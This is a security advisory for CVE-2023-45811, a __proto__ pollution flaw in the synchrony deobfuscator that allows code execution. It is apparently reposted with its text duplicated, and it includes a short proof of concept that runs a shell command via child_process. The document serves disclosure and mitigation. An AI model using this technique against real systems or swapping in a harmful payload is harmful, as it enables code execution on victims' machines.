Headline
GHSA-jg82-xh3w-rhxx: Synchrony deobfuscator prototype pollution vulnerability leading to arbitrary code execution
Impact
A __proto__ pollution vulnerability exists in synchrony versions before v2.4.4. Successful exploitation could lead to arbitrary code execution.
Summary
A __proto__ pollution vulnerability exists in the LiteralMap transformer allowing crafted input to modify properties in the Object prototype.
When executing in Node.js, due to use of the prettier module, defining a parser property on __proto__ with a path to a JS module on disk causes a require of the value which can lead to arbitrary code execution.
Patch
A fix has been released in [email protected].
Mitigation
- Upgrade synchrony to v2.4.4
- Launch node with the –disable-proto=delete or –disable-proto=throw flag
Proof of Concept
Craft a malicious input file named poc.js as follows:
// Malicious code to be run after this file is imported. Logs the result of shell command "dir" to the console.
console.log(require('child_process').execSync('dir').toString())
// Synchrony exploit PoC
{
var __proto__ = { parser: 'poc.js' }
}
Then, run synchrony poc.js from the same directory as the malicious file.
Credits
This vulnerability was found and disclosed by William Khem-Marquez.
Impact
A proto pollution vulnerability exists in synchrony versions before v2.4.4. Successful exploitation could lead to arbitrary code execution.
Summary
A proto pollution vulnerability exists in the LiteralMap transformer allowing crafted input to modify properties in the Object prototype.
When executing in Node.js, due to use of the prettier module, defining a parser property on proto with a path to a JS module on disk causes a require of the value which can lead to arbitrary code execution.
Patch
A fix has been released in [email protected].
Mitigation
- Upgrade synchrony to v2.4.4
- Launch node with the --disable-proto=delete or --disable-proto=throw flag
Proof of Concept
Craft a malicious input file named poc.js as follows:
// Malicious code to be run after this file is imported. Logs the result of shell command “dir” to the console. console.log(require(‘child_process’).execSync(‘dir’).toString())
// Synchrony exploit PoC { var __proto__ = { parser: ‘poc.js’ } }
Then, run synchrony poc.js from the same directory as the malicious file.
Credits
This vulnerability was found and disclosed by William Khem-Marquez.
References
- GHSA-jg82-xh3w-rhxx
- https://nvd.nist.gov/vuln/detail/CVE-2023-45811
- relative/synchrony@b583126
- https://github.com/relative/synchrony/security/advisories/src/transformers/literalmap.ts
Related news
Synchrony deobfuscator is a javascript cleaner & deobfuscator. A `__proto__` pollution vulnerability exists in versions before v2.4.4. Successful exploitation could lead to arbitrary code execution. A `__proto__` pollution vulnerability exists in the `LiteralMap` transformer allowing crafted input to modify properties in the Object prototype. A fix has been released in `[email protected]`. Users are advised to upgrade. Users unable to upgrade should launch node with the [--disable-proto=delete][disable-proto] or [--disable-proto=throw][disable-proto] flags